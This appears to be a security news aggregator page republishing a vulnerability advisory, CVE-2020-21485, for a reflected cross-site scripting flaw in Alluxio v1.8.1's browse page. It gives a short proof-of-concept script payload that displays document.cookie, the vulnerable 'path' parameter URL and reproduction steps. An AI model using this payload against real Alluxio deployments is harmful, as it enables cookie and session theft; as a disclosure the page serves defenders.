Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-21485: Alluxio v1.8.1 reflected xss vulnerability · Issue #10552 · Alluxio/alluxio

Cross Site Scripting vulnerability in Alluxio v.1.8.1 allows a remote attacker to executea arbitrary code via the path parameter in the browse board component.

CVE
Open in Source
#xss#vulnerability#web

A reflected XSS vulnerability was found in Allusio V1.8.1.

An attacker can inject arbitrary web script or HTML through the “path” parameter in the Browse board, causing a reflected XSS attack and stealing cookies.

POC:
msgbox(“foo”)";</script><script>alert(document.cookie)</script><script>

Vulnerability trigger point:
http://localhost/browse?path=%2F&offset=0&limit=9
XSS vulnerability will be successfully triggered when an attacker writes POC in the “path” parameter at the URL

Process:

  1. Select browse and write POC in the “path” parameter

2.Trigger XSS vulnerability

Related news

GHSA-298m-hvgh-x9cw: Alluxio Cross Site Scripting vulnerability

Cross Site Scripting vulnerability in Alluxio v.1.8.1 allows a remote attacker to executea arbitrary code via the path parameter in the browse board component.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE